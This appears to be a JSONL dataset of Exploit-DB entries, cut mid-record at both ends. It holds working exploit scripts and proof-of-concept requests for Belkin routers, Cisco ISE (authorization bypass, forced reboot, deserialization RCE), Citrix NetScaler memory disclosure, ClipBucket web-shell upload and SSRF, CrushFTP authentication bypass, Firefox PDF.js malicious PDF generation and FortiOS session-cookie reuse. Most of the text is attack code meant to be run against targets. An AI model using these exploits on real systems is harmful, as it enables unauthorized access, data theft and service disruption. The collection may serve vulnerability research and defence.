&rem) == -1)\n {\n if (errno == EINTR)\n {\n\n req = rem;\n continue;\n }\n perror(\"\\e[0;31m[-] Nanosleep failed !\\e[0m\");\n exitSyscall();\n }\n\n printf(\"\\e[0;34m[+] Sleep successful.\\e[0m\\n\");\n}\nvoid detectDeviceType(const char *routerIp)\n{\n printf(\"\\n=================================== [type Device] ===================================\\e[0m\\n\");\n\n CURL *curl = curl_easy_init();\n if (!curl) exitSyscall();\n\n struct Mem response = { NULL, 0 };\n\n\n char full[FULL];\n int len = snprintf(full, sizeof(full), \"http://%s\", routerIp);\n if (checkLen(len, full, sizeof(full)))\n {\n exitSyscall();\n }\n\n curl_easy_setopt(curl, CURLOPT_URL, full);\n curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, write_cb);\n curl_easy_setopt(curl,\n\t\tCURLOPT_CONNECTTIMEOUT,\n\t\t5L);\n if (sleepS)\n {\n\t\tsleepTime(sleepS);\n }\n curl_easy_setopt(curl,\n\t\t CURLOPT_TIMEOUT,\n\t\t 10L);\n curl_easy_setopt(curl, CURLOPT_WRITEDATA, &response);\n curl_easy_setopt(curl, CURLOPT_TIMEOUT, 5L);\n\n CURLcode res = curl_easy_perform(curl);\n if (res != CURLE_OK)\n {\n fprintf(stderr, \"\\e[0;31m[-] curl error: %s\\n\", curl_easy_strerror(res));\n }\n\n if (response.buffer)\n {\n if (strstr(response.buffer, \"F9K1009\"))\n {\n \tprintf(\"\\e[0;36m[+] Device: Belkin F9K1009\\e[0m\\n\");\n }\n\n else if (strstr(response.buffer, \"F9K1010\"))\n {\n \tprintf(\"\\e[0;36m[+] Device: Belkin F9K1010\\e[0m\\n\");\n }\n\n else\n {\n \t printf(\"\\e[0;31m[-] Unknown device type\\e[0m\\n\");\n \tfree(response.buffer);\n }\n\n }\n else\n {\n printf(\"\\e[0;31m[-] Response Is NULL !\\n\");\n };\n response.buffer= NULL;\n response.len = 0;\n curl_easy_cleanup(curl);\n printf(\"=====================================================================================\\n\");\n}\n\n\nvoid credentialsRequest(const char *routerIp)\n{\n\tCURL *curl = curl_easy_init();\n\tif (curl == NULL)\n\t{\n\t\tprintf(\"\\e[0;31m[-] Error Create Object CURL !\\e[0m\\n\");\n\t\texitSyscall();", "cve_id": "CVE-2025-8730", "source": "exploitdb", "timestamp": "2025-08-11T00:00:00+00:00"} {"id": "bd2a940f75e826f1bff2", "text": "Cisco ISE 3.0 - Authorization Bypass\n\n# Exploit Title: Cisco ISE 3.0 - Authorization Bypass\n# Exploit Author: @ibrahimsql ibrahimsql.com\n# Exploit Author's github: https://github.com/ibrahmsql\n# Description: Cisco ISE API Authorization Bypass\n# CVE: CVE-2025-20125\n# Vendor Homepage: https://www.cisco.com/\n# Requirements: requests>=2.25.0, urllib3>=1.26.0\n# Usage: python3 CVE-2025-20125.py --url https://ise.target.com --session TOKEN --read\n\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport requests\nimport sys\nimport argparse\nimport urllib3\nurllib3.disable_warnings()\n\ndef banner():\n print(r\"\"\"\n ___ ____ ___ ___ _____ ____ ___ ____\n / __)(_ _)/ __) / __)( _ ) (_ _)/ __)( ___)\n( (__ _)(_ \\__ \\( (__ )(_)( _)(_ \\__ \\ )__)\n \\___)(____)(___/ \\___)(_____) (____)(___/(____)\nCisco ISE Authorization Bypass\nCVE-2025-20125\nAuthor: ibrahmsql | github.com/ibrahmsql\n\"\"\")\n\ndef exploit_config_read(base_url, session_token):\n \"\"\"\n CVE-2025-20125: Read sensitive configuration\n \"\"\"\n endpoint = f\"{base_url}/api/v1/admin/config/export\"\n headers = {\n \"Cookie\": f\"ISESSIONID={session_token}\",\n \"User-Agent\": \"Mozilla/5.0 (compatible; ISE-Exploit)\"\n }\n\n print(f\"[+] Attempting to read configuration from: {endpoint}\")\n\n try:\n r = requests.get(endpoint, headers=headers, verify=False, timeout=10)\n\n if r.status_code == 200:\n print(\"[+] Configuration read successful!\")\n print(f\"[+] Response length: {len(r.text)} bytes\")\n if r.text:\n print(f\"[+] Config preview: {r.text[:300]}...\")\n return True\n else:\n print(f\"[-] Config read failed: {r.status_code}\")\n return False\n\n except requests.exceptions.RequestException as e:\n print(f\"[-] Request failed: {e}\")\n return False\n\ndef exploit_config_reload(base_url, session_token):\n \"\"\"\n CVE-2025-20125: Force configuration reload\n \"\"\"\n endpoint = f\"{base_url}/api/v1/admin/reload\"\n headers = {\n \"Cookie\": f\"ISESSIONID={session_token}\",\n \"Content-Type\": \"application/json\",\n \"User-Agent\": \"Mozilla/5.0 (compatible; ISE-Exploit)\"\n }\n\n print(f\"[+] Sending config reload request to: {endpoint}\")\n\n try:\n r = requests.post(endpoint, headers=headers, verify=False, timeout=10)\n\n if r.status_code in (200, 204):\n print(\"[+] Configuration reload accepted!\")\n print(\"[+] System may be restarting services...\")\n return True\n elif r.status_code == 401:\n print(\"[-] Authentication failed - invalid session token\")\n elif r.status_code == 403:\n print(\"[-] Access denied - insufficient privileges\")\n else:\n print(f\"[-] Reload failed: {r.status_code}\")\n\n return False\n\n except requests.exceptions.RequestException as e:\n print(f\"[-] Request failed: {e}\")\n return False\n\ndef exploit_system_reboot(base_url, session_token):\n \"\"\"\n CVE-2025-20125: Force system reboot\n \"\"\"\n endpoint = f\"{base_url}/api/v1/admin/reboot\"\n headers = {\n \"Cookie\": f\"ISESSIONID={session_token}\",\n \"Content-Type\": \"application/json\",\n \"User-Agent\": \"Mozilla/5.0 (compatible; ISE-Exploit)\"\n }\n\n print(f\"[+] Sending system reboot request to: {endpoint}\")\n print(\"[!] WARNING: This will reboot the target system!\")\n\n try:\n r = requests.post(endpoint, headers=headers, verify=False, timeout=10)\n\n if r.status_code in (200, 204):\n print(\"[+] System reboot initiated!\")\n print(\"[+] Target system should be rebooting now...\")\n return True\n else:\n print(f\"[-] Reboot failed: {r.status_code}\")\n return False\n\n except requests.exceptions.RequestException as e:\n print(f\"[-] Request failed: {e}\")\n return False\n\ndef main():\n parser = argparse.ArgumentParser(\n description=\"CVE-2025-20125 - Cisco ISE Authorization Bypass\",\n formatter_class=argparse.RawDescriptionHelpFormatter,\n epilog=\"\"\"\nExamples:\n python3 CVE-2025-20125.py --url https://ise.company.com --session ABCD1234 --read\n python3 CVE-2025-20125.py --url https://10.0.0.1:9060 --session TOKEN123 --reload\n python3 CVE-2025-20125.py --url https://ise.target.com --session XYZ789 --reboot\n \"\"\"\n )\n\n parser.add_argument(\"--url\", required=True, help=\"Base URL of Cisco ISE appliance\")\n parser.add_argument(\"--session\", required=True, help=\"Authenticated ISE session token\")\n parser.add_argument(\"--read\", action=\"store_true\", help=\"Read sensitive configuration\")\n parser.add_argument(\"--reload\", action=\"store_true\", help=\"Force configuration reload\")\n parser.add_argument(\"--reboot\", action=\"store_true\", help=\"Force system reboot\")\n\n args = parser.parse_args()\n\n banner()\n\n # URL validation\n if not args.url.startswith(('http://', 'https://')):\n print(\"[-] URL must start with http:// or https://\")", "cve_id": "CVE-2025-20125", "source": "exploitdb", "timestamp": "2025-08-11T00:00:00+00:00"} {"id": "737bcfda4d69d28190ea", "text": "Cisco ISE 3.0 - Remote Code Execution (RCE)\n\n# Exploit Title: Cisco ISE 3.0 - Remote Code Execution (RCE)\n# Exploit Author: @ibrahimsql ibrahimsql.com\n# Exploit Author's github: https://github.com/ibrahmsql\n# Description: Cisco ISE API Java Deserialization RCE\n# CVE: CVE-2025-20124\n# Vendor Homepage: https://www.cisco.com/\n# Requirements: requests>=2.25.0, urllib3>=1.26.0\n# Usage: python3 CVE-2025-20124.py --url https://ise.target.com --session TOKEN --cmd \"id\"\n\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport requests\nimport sys\nimport argparse\nimport base64\nimport urllib3\nurllib3.disable_warnings()\n\ndef banner():\n print(r\"\"\"\n_________ .__\n\\_ ___ \\|__| ______ ____ ____\n/ \\ \\/| |/ ___// ___\\/ _ \\\n\\ \\___| |\\___ \\\\ \\__( <_> )\n \\______ /__/____ >\\___ >____/\n \\/ \\/ \\/\n\nCisco ISE Java Deserialization RCE\nCVE-2025-20124\nAuthor: ibrahmsql | github.com/ibrahmsql\n\"\"\")\n\ndef build_serialize_payload(cmd):\n \"\"\"\n Java deserialization payload builder\n \"\"\"\n java_cmd = cmd.replace('\"', '\\\\\"')\n # Placeholder serialization - gerçek exploit için gadget chain gerekli\n payload = f'\\xac\\xed\\x00\\x05sr\\x00...ExecGadget...execute(\"{java_cmd}\")'\n return base64.b64encode(payload.encode()).decode()\n\ndef exploit_deserialization(base_url, session_token, cmd):\n \"\"\"\n CVE-2025-20124: Java Deserialization RCE\n \"\"\"\n endpoint = f\"{base_url}/api/v1/admin/deserializer\"\n headers = {\n \"Cookie\": f\"ISESSIONID={session_token}\",\n \"Content-Type\": \"application/json\",\n \"User-Agent\": \"Mozilla/5.0 (compatible; ISE-Exploit)\"\n }\n\n payload = build_serialize_payload(cmd)\n data = {\"object\": payload}\n\n print(f\"[+] Target: {base_url}\")\n print(f\"[+] Endpoint: {endpoint}\")\n print(f\"[+] Command: {cmd}\")\n print(f\"[+] Sending deserialization payload...\")\n\n try:\n r = requests.post(endpoint, json=data, headers=headers, verify=False, timeout=10)\n\n if r.status_code == 200:\n print(\"[+] Payload successfully sent!\")\n print(\"[+] Command possibly executed!\")\n if r.text:\n print(f\"[+] Response: {r.text[:500]}\")\n elif r.status_code == 401:\n print(\"[-] Authentication failed - invalid session token\")\n elif r.status_code == 403:\n print(\"[-] Access denied - insufficient privileges\")\n elif r.status_code == 404:\n print(\"[-] Endpoint not found - target may not be vulnerable\")\n else:\n print(f\"[-] Unexpected response: {r.status_code}\")\n print(f\"[-] Response: {r.text[:200]}\")\n\n except requests.exceptions.RequestException as e:\n print(f\"[-] Request failed: {e}\")\n\ndef main():\n parser = argparse.ArgumentParser(\n description=\"CVE-2025-20124 - Cisco ISE Java Deserialization RCE\",\n formatter_class=argparse.RawDescriptionHelpFormatter,\n epilog=\"\"\"\nExamples:\n python3 CVE-2025-20124.py --url https://ise.company.com --session ABCD1234 --cmd \"id\"\n python3 CVE-2025-20124.py --url https://10.0.0.1:9060 --session TOKEN123 --cmd \"whoami\"\n \"\"\"\n )\n\n parser.add_argument(\"--url\", required=True, help=\"Base URL of Cisco ISE appliance\")\n parser.add_argument(\"--session\", required=True, help=\"Authenticated ISE session token\")\n parser.add_argument(\"--cmd\", required=True, help=\"Command to execute via deserialization\")\n\n args = parser.parse_args()\n\n banner()\n\n # URL validation\n if not args.url.startswith(('http://', 'https://')):\n print(\"[-] URL must start with http:// or https://\")\n sys.exit(1)\n\n exploit_deserialization(args.url, args.session, args.cmd)\n\nif __name__ == \"__main__\":\n main()", "cve_id": "CVE-2025-20124", "source": "exploitdb", "timestamp": "2025-08-11T00:00:00+00:00"} {"id": "5dd8062cec7966cdf184", "text": "Citrix NetScaler ADC/Gateway 14.1 - Memory Disclosure\n\n# Exploit Title: Citrix NetScaler ADC/Gateway 14.1 - Memory Disclosure\n# Exploit Author: Yesith Alvarez\n# Vendor Homepage: hhttps://support.citrix.com/support-home/kbsearch/article?articleNumber=CTX693420\n# CVE: CVE-2025-5777\n# Link: https://github.com/yealvarez/CVE/blob/main/CVE-2025-5777/exploit.py\n\nimport re\nimport sys\nimport warnings\nimport requests\nfrom time import sleep\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\n\n\ndef title():\n print(r'''\n ______ _______ ____ ___ ____ ____ ____ _____ _____ _____\n / ___\\ \\ / / ____| |___ \\ / _ \\___ \\| ___| | ___|___ |___ |___ |\n| | \\ \\ / /| _| _____ __) | | | |__) |___ \\ ____|___ \\ / / / / / /\n| |___ \\ V / | |__|_____/ __/| |_| / __/ ___) |_____|__) |/ / / / / /\n \\____| \\_/ |_____| |_____|\\___/_____|____/ |____//_/ /_/ /_/\n\n[+] CitrixBleed - Memory Disclosure (Out-of-Bounds Read)\n[+] Author: Yesith Alvarez\n[+] Github: https://github.com/yealvarez\n[+] Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/\n[+] Code improvements: https://github.com/yealvarez/CVE/blob/main/CVE-2025-5777/exploit.py\n ''')\n\n\ndef print_hex(data: bytes):\n for i in range(0, len(data), 16):\n chunk = data[i:i+16]\n hex_part = \" \".join(f\"{b:02X}\" for b in chunk)\n ascii_part = \"\".join(chr(b) if 32 <= b <= 126 else \".\" for b in chunk)\n print(\"{:08X}\".format(i) + \" \" + \"{:<47}\".format(hex_part) + \" \" + ascii_part)\n\ndef extraction(blob: bytes) -> bytes | None:\n OpenInitialValue = \"\".encode(\"utf-8\")\n closenitialValue = \"\".encode(\"utf-8\")\n matched = \"(.*?)\".encode(\"utf-8\")\n extract = re.compile(re.escape(OpenInitialValue) + matched + re.escape(closenitialValue),flags=re.DOTALL | re.IGNORECASE)\n m = extract.search(blob)\n return None if m is None else m.group(1)\n\n\ndef exploit(target: str):\n url = \"https://\"+target+\"/p/u/doAuthentication.do\"\n\n headers = {\n \"Content-Type\": \"application/x-www-form-urlencoded\",\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36\"\n }\n\n try:\n resp = requests.post(\n url,\n data=\"login\".encode(\"utf-8\"),\n headers=headers,\n timeout=15,\n verify=False,\n )\n resp.raise_for_status()\n except Exception as e:\n print(\"[\"+target+\"] Error No Vulnerable: \" + str(e))\n return\n\n binary = extraction(resp.content)\n if binary is None:\n print(\"[\"+target+\"] Connection Error \")\n return\n print(\"\\n[+] Captured \"+str(len(binary))+\" bytes from the Target [\"+target+\"]:\\n\")\n print_hex(binary)\n\nif __name__ == '__main__':\n warnings.simplefilter(\"ignore\", InsecureRequestWarning)\n title()\n if len(sys.argv) < 2:\n print('[+] USAGE: python3'+sys.argv[0]+' \\n')\n print('[+] Example: python3'+sys.argv[0]+' 10.10.10.10\\n')\n sys.exit(0)\n else:\n target = sys.argv[1]\n try:\n while True:\n exploit(target)\n\n except KeyboardInterrupt:\n print(\"\\n[+] Stopped by user.\")", "cve_id": "CVE-2025-5777", "source": "exploitdb", "timestamp": "2025-08-11T00:00:00+00:00"} {"id": "1b70b198f567baf3c650", "text": "ClipBucket 5.5.0 - Arbitrary File Upload\n\n# Exploit Title: ClipBucket 5.5.0 - Arbitrary File Upload\n\n# Google Dork: N/A\n\n# Date: 2025-09-11\n\n# Exploit Author: Mukundsinh Solanki (r00td3str0y3r)\n\n# Vendor Homepage: https://clipbucket.com\n\n# Software Link: https://github.com/MacWarrior/clipbucket-v5\n\n# Version: <= 5.5.0\n\n# Tested on: Ubuntu 20.04 LTS, PHP 7.4\n\n# CVE: CVE-2025-55912\n\n## Vulnerability Description:\nClipBucket <= 5.5.0 suffers from an unauthenticated arbitrary file upload\nvulnerability in `upload/actions/photo_uploader.php`. Missing access\ncontrols and insufficient validation of uploaded files allow an attacker to\nupload a crafted PHP file and execute it remotely, leading to full remote\ncode execution (RCE).\n\n## PoC Request:\n\nPOST /upload/actions/photo_uploader.php HTTP/1.1\nHost: victim.com\nContent-Type: multipart/form-data; boundary=----BOUND\n\n------BOUND\nContent-Disposition: form-data; name=\"Filedata\"; filename=\"shell.php\"\nContent-Type: application/x-php\n\n\n------BOUND--\n\n\nThe file is uploaded without authentication. The attacker can then access\nit:\n\n\nhttp://victim.com/files/photos/shell.php?cmd=id\n\n\n## Impact:\n- Unauthenticated remote code execution (RCE)\n- Full compromise of target application and underlying server\n\nRegards,\nMukundsinh Solanki\n+916355251151", "cve_id": "CVE-2025-55912", "source": "exploitdb", "timestamp": "2025-09-16T00:00:00+00:00"} {"id": "f1d1ac5d53971e238196", "text": "ClipBucket 5.5.2 Build #90 - Server-Side Request Forgery (SSRF)\n\n# Exploit Title: ClipBucket 5.5.2 Build #90 - Server-Side Request Forgery (SSRF)\n# Google Dork: N/A\n# Date: 2025-09-11\n# Exploit Author: Mukundsinh Solanki (r00td3str0y3r)\n# Vendor Homepage: https://clipbucket.com\n# Software Link: https://github.com/MacWarrior/clipbucket-v5\n# Version: 5.5.2 Build #90\n# Tested on: Ubuntu 20.04 LTS, PHP 7.4\n# CVE: CVE-2025-55911\n\n## Vulnerability Description:\nAn authenticated user with regular permissions can exploit a Server-Side\nRequest Forgery (SSRF) vulnerability via the `file` parameter in\n`actions/file_downloader.php`. By supplying a crafted URL, attackers can\nforce the server to make arbitrary HTTP requests to internal services or\nexternal systems. This can lead to internal network enumeration, data\nexfiltration, or pivoting attacks.\n\n## PoC Request:\n\nPOST /upload/actions/file_downloader.php HTTP/1.1\nHost: victim.com\nContent-Type: application/x-www-form-urlencoded\nCookie: PHPSESSID=validsession\n\nfile=http://127.0.0.1:3306/test.mp4\n\n\n\n\nThe server attempts to connect to the internal service (`127.0.0.1:3306`),\ndemonstrating SSRF.\n\n## Impact:\n- Internal service enumeration\n- Potential metadata leakage\n- Pivoting to internal systems\n\n\nRegards,\nMukundsinh Solanki\n+916355251151", "cve_id": "CVE-2025-55911", "source": "exploitdb", "timestamp": "2025-09-16T00:00:00+00:00"} {"id": "9cda8f23eb892e3e1989", "text": "CrushFTP 11.3.1 - Authentication Bypass\n\n# Exploit Title: CrushFTP 11.3.1 - Authentication Bypass\n# Date: 2025-05-15\n# Exploit Author: @İbrahimsql\n# Exploit Author's github: https://github.com/ibrahimsql\n# Vendor Homepage: https://www.crushftp.com\n# Software Link: https://www.crushftp.com/download.html\n# Version: < 10.8.4, < 11.3.1\n# Tested on: Ubuntu 22.04 LTS, Windows Server 2019, Kali Linux 2024.1\n# CVE: CVE-2025-31161\n# Description:\n# CrushFTP before 10.8.4 and 11.3.1 allows unauthenticated HTTP(S) port access and full admin takeover\n# through a race condition and header parsing logic flaw in the AWS4-HMAC authorization mechanism.\n# Exploiting this allows bypassing authentication and logging in as any known user (e.g. crushadmin).\n\n# Requirements: requests>=2.28.1 , colorama>=0.4.6 , urllib3>=1.26.12 , prettytable>=2.5.0 , rich>=12.6.0\n\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport argparse\nimport concurrent.futures\nimport json\nimport logging\nimport os\nimport random\nimport re\nimport socket\nimport string\nimport sys\nimport time\nfrom datetime import datetime\nfrom typing import Dict, List, Optional, Tuple, Union\n\nimport requests\nimport urllib3\nfrom colorama import Fore, Style, init\nfrom prettytable import PrettyTable\nfrom rich.console import Console\nfrom rich.progress import Progress, BarColumn, TextColumn, TimeRemainingColumn\n\n# Initialize colorama\ninit(autoreset=True)\n\n# Disable SSL warnings\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\n# Initialize Rich console\nconsole = Console()\n\n# Global variables\nVERSION = \"2.0.0\"\nUSER_AGENTS = [\n \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36\",\n \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36\",\n \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0\",\n \"Mozilla/5.0 (Macintosh; Intel Mac OS X 11.5; rv:90.0) Gecko/20100101 Firefox/90.0\",\n \"Mozilla/5.0 (Macintosh; Intel Mac OS X 11_5_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15\",\n \"Mozilla/5.0 (Windows; Windows NT 10.3; WOW64) AppleWebKit/601.13 (KHTML, like Gecko) Chrome/53.0.2198.319 Safari/601.5 Edge/15.63524\",\n \"Mozilla/5.0 (Windows NT 10.2; Win64; x64; en-US) AppleWebKit/602.15 (KHTML, like Gecko) Chrome/47.0.1044.126 Safari/533.2 Edge/9.25098\",\n \"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.3; Win64; x64; en-US Trident/4.0)\",\n \"Mozilla/5.0 (iPhone; CPU iPhone OS 10_7_9; like Mac OS X) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/49.0.1015.193 Mobile Safari/600.9\"\n]\n\n# Banner\nBANNER = fr\"\"\"\n{Fore.CYAN}\n / ____/______ _______/ /_ / ____/ /_____\n / / / ___/ / / / ___/ __ \\/ /_ / __/ __ \\\n/ /___/ / / /_/ (__ ) / / / __/ / /_/ /_/ /\n\\____/_/ \\__,_/____/_/ /_/_/ \\__/ .___/\n /_/\n{Fore.GREEN}CVE-2025-31161 Exploit {VERSION}{Fore.YELLOW} | {Fore.CYAN} Developer @ibrahimsql\n{Style.RESET_ALL}\n\"\"\"\n\n# Setup logging\ndef setup_logging(log_level: str, log_file: Optional[str] = None) -> None:\n \"\"\"Configure logging based on specified level and output file.\"\"\"\n numeric_level = getattr(logging, log_level.upper(), None)\n if not isinstance(numeric_level, int):\n raise ValueError(f\"Invalid log level: {log_level}\")\n\n log_format = \"%(asctime)s - %(levelname)s - %(message)s\"\n handlers = []\n\n if log_file:\n handlers.append(logging.FileHandler(log_file))\n\n handlers.append(logging.StreamHandler())\n\n logging.basicConfig(\n level=numeric_level,\n format=log_format,\n handlers=handlers\n )\n\nclass TargetManager:\n \"\"\"Manages target hosts and related operations.\"\"\"\n\n def __init__(self, target_file: Optional[str] = None, single_target: Optional[str] = None):\n self.targets = []\n self.vulnerable_targets = []\n self.exploited_targets = []\n\n if target_file:\n self.load_targets_from_file(target_file)\n elif single_target:\n self.add_target(single_target)\n\n def load_targets_from_file(self, filename: str) -> None:\n \"\"\"Load targets from a file.\"\"\"\n try:\n with open(filename, \"r\") as f:\n self.targets = [line.strip() for line in f if line.strip()]\n\n if not self.targets:\n logging.warning(f\"Target file '{filename}' is empty or contains only whitespace.\")\n else:\n logging.info(f\"Loaded {len(self.targets)} targets from {filename}\")\n except FileNotFoundError:\n logging.error(f\"Target file '{filename}' not found.\")\n sys.exit(1)\n except Exception as e:\n logging.error(f\"Error loading targets: {e}\")\n sys.exit(1)\n\n def add_target(self, target: str) -> None:\n \"\"\"Add a single target.\"\"\"\n if target not in self.targets:\n self.targets.append(target)\n\n def mark_as_vulnerable(self, target: str) ", "cve_id": "CVE-2025-31161", "source": "exploitdb", "timestamp": "2025-05-18T00:00:00+00:00"} {"id": "00f7897a5c3dcc88e33b", "text": "Firefox ESR 115.11 - PDF.js Arbitrary JavaScript execution\n\n# Exploit Title: Firefox ESR 115.11 - Arbitrary JavaScript execution in\nPDF.js\n# Date: 2025-04-16\n# Exploit Author: Milad Karimi (Ex3ptionaL)\n# Contact: miladgrayhat@gmail.com\n# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL\n# MiRROR-H: https://mirror-h.org/search/hacker/49626/\n# Vendor Homepage: https://wordpress.org\n# Version: = 115.11\n# Tested on: Win, Ubuntu\n# CVE : CVE-2024-4367\n\n#!/usr/bin/env python3\n\nimport sys\n\ndef generate_payload(payload):\n backslash_char = \"\\\\\"\n fmt_payload = payload.replace('(', '\\\\(').replace(')', '\\\\)')\n font_matrix = f\"/FontMatrix [0.1 0 0 0.1 0 (1{backslash_char});\\n\" +\nf\"{fmt_payload}\" + \"\\n//)]\"\n return f\"\"\"\n%PDF-1.4\n%DUMMY\n8 0 obj\n<<\n/PatternType 2\n/Shading<<\n /Function<<\n /Domain[0 1]\n /C0[0 0 1]\n /C1[1 0.6 0]\n /N 1\n /FunctionType 2\n >>\n /ShadingType 2\n /Coords[46 400 537 400]\n /Extend[false false]\n /ColorSpace/DeviceRGB\n>>\n/Type/Pattern\n>>\nendobj\n5 0 obj\n<<\n/Widths[573 0 582 0 548 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0\n0 0 573 0 573 0 341]\n/Type/Font\n/BaseFont/PAXEKO+SourceSansPro-Bold\n/LastChar 102\n/Encoding/WinAnsiEncoding\n{font_matrix}\n/Subtype/Type1\n/FirstChar 65\n/FontDescriptor 9 0 R\n>>\nendobj\n2 0 obj\n<<\n/Kids[3 0 R]\n/Type/Pages\n/Count 1\n>>\nendobj\n9 0 obj\n<<\n/Type/FontDescriptor\n/ItalicAngle 0\n/Ascent 751\n/FontBBox[-6 -12 579 713]\n/FontName/PAXEKO+SourceSansPro-Bold\n/StemV 100\n/CapHeight 713\n/Flags 32\n/FontFile3 10 0 R\n/Descent -173\n/MissingWidth 250\n>>\nendobj\n6 0 obj\n<<\n/Length 128\n>>\nstream\n47 379 489 230 re S\n/Pattern cs\nBT\n 50 500 Td\n 117 TL\n /F1 150 Tf\n /P1 scn\n (AbCdEf) Tj\n /P2 scn\n (AbCdEf) '\nET\nendstream\nendobj\n3 0 obj\n<<\n/Type/Page\n/Resources 4 0 R\n/Contents 6 0 R\n/Parent 2 0 R\n/MediaBox[0 0 595.2756 841.8898]\n>>\nendobj\n10 0 obj\n<<\n/Length 800\n/Subtype/Type2\n>>\nstream\n\nendstream\nendobj\n7 0 obj\n<<\n/PatternType 1\n/Matrix[1 0 0 1 50 0]\n/Length 58\n/TilingType 1\n/BBox[0 0 16 16]\n/YStep 16\n/PaintType 1\n/Resources<<\n>>\n/XStep 16\n>>\nstream\n0.65 g\n0 0 16 16 re f\n0.15 g\n0 0 8 8 re f\n8 8 8 8 re f\nendstream\nendobj\n4 0 obj\n<<\n/Pattern<<\n /P1 7 0 R\n /P2 8 0 R\n>>\n/Font<<\n /F1 5 0 R\n>>\n>>\nendobj\n1 0 obj\n<<\n/Pages 2 0 R\n/Type/Catalog\n/OpenAction[3 0 R /Fit]\n>>\nendobj\n\nxref\n0 11\n0000000000 65535 f\n0000002260 00000 n\n0000000522 00000 n\n0000000973 00000 n\n0000002178 00000 n\n0000000266 00000 n\n0000000794 00000 n\n0000001953 00000 n\n0000000015 00000 n\n0000000577 00000 n\n0000001085 00000 n\ntrailer\n<<\n/ID[(DUMMY) (DUMMY)]\n/Root 1 0 R\n/Size 11\n>>\nstartxref\n2333\n%%EOF\n\"\"\"\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) != 2:\n print(f\"Usage: {sys.argv[0]} \")\n sys.exit(1)\n print(\"[+] Created malicious PDF file: poc.pdf\")\n print(\"[+] Open the file with the vulnerable application to trigger the\nexploit.\")\n\n payload = generate_payload(\n sys.argv[1])\n with open(\"poc.pdf\", \"w\") as f:\n f.write(payload)\n\n sys.exit(0)", "cve_id": "CVE-2024-4367", "source": "exploitdb", "timestamp": "2025-04-22T00:00:00+00:00"} {"id": "d3dfd4cee1e830bc6dc4", "text": "FortiOS SSL-VPN 7.4.4 - Insufficient Session Expiration & Cookie Reuse\n\n#!/usr/bin/env python3\n\"\"\"\n# Exploit Title: FortiOS SSL-VPN 7.4.4 - Insufficient Session Expiration & Cookie Reuse\n# Date: 2025-06-15\n# Exploit Author: Shahid Parvez Hakim (BugB Technologies)\n# Vendor Homepage: https://www.fortinet.com\n# Software Link: https://www.fortinet.com/products/secure-sd-wan/fortigate\n# Version: FortiOS 7.6.0, 7.4.0-7.4.7, 7.2.0-7.2.10, 7.0.x (all), 6.4.x (all)\n# Tested on: FortiOS 7.4.x, 7.2.x\n# CVE: CVE-2024-50562\n# CVSS: 4.4 (Medium)\n# Category: Session Management\n# CWE: CWE-613 (Insufficient Session Expiration)\n\nDescription:\nAn insufficient session expiration vulnerability in FortiOS SSL-VPN allows an attacker\nto reuse stale session cookies after logout, potentially leading to unauthorized access.\nThe SVPNTMPCOOKIE remains valid even after the primary SVPNCOOKIE is invalidated during logout.\n\nReferences:\n- https://fortiguard.com/psirt/FG-IR-24-339\n- https://nvd.nist.gov/vuln/detail/CVE-2024-50562\n\nUsage:\npython3 fortinet_cve_2024_50562.py -t -u -p [options]\n\nExample:\npython3 fortinet_cve_2024_50562.py -t 192.168.1.10:443 -u testuser -p testpass\npython3 fortinet_cve_2024_50562.py -t 10.0.0.1:4433 -u admin -p password123 --realm users\n\"\"\"\n\nimport argparse\nimport requests\nimport urllib3\nimport re\nimport sys\nfrom urllib.parse import urlparse\n\n# Disable SSL warnings for testing\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\nclass FortinetExploit:\n def __init__(self, target, username, password, realm=\"\", timeout=10, force=False):\n self.target = target\n self.username = username\n self.password = password\n self.realm = realm\n self.timeout = timeout\n self.force = force\n self.base_url = f\"https://{target}\"\n self.session = None\n\n def banner(self):\n \"\"\"Display exploit banner\"\"\"\n print(\"=\" * 70)\n print(\"CVE-2024-50562 - Fortinet SSL-VPN Session Management Bypass\")\n print(\"Author: Shahid Parvez Hakim (BugB Technologies)\")\n print(\"CVSS: 4.4 (Medium) | FG-IR-24-339\")\n print(\"=\" * 70)\n print(f\"Target: {self.target}\")\n print(f\"User: {self.username}\")\n print(\"-\" * 70)\n\n def validate_target(self):\n \"\"\"Check if target is reachable and is Fortinet SSL-VPN\"\"\"\n try:\n print(\"[*] Validating target...\")\n response = requests.get(f\"{self.base_url}/remote/login\",\n verify=False, timeout=self.timeout)\n\n # More flexible detection for Fortinet SSL-VPN\n fortinet_indicators = [\n \"fortinet\", \"fortigate\", \"forticlient\",\n \"sslvpn\", \"/remote/login\", \"SVPNCOOKIE\",\n \"logincheck\", \"hostcheck_install\",\n \"fgt_lang\", \"realm\"\n ]\n\n response_text = response.text.lower()\n detected_indicators = [indicator for indicator in fortinet_indicators\n if indicator in response_text]\n\n if detected_indicators:\n print(f\"[+] Target confirmed as Fortinet SSL-VPN (indicators: {', '.join(detected_indicators[:3])})\")\n return True\n elif response.status_code == 200:\n print(\"[!] Target reachable but Fortinet detection uncertain - proceeding anyway\")\n return True\n else:\n print(\"[-] Target does not appear to be Fortinet SSL-VPN\")\n return False\n\n except requests.exceptions.RequestException as e:\n print(f\"[-] Connection failed: {e}\")\n return False\n\n def 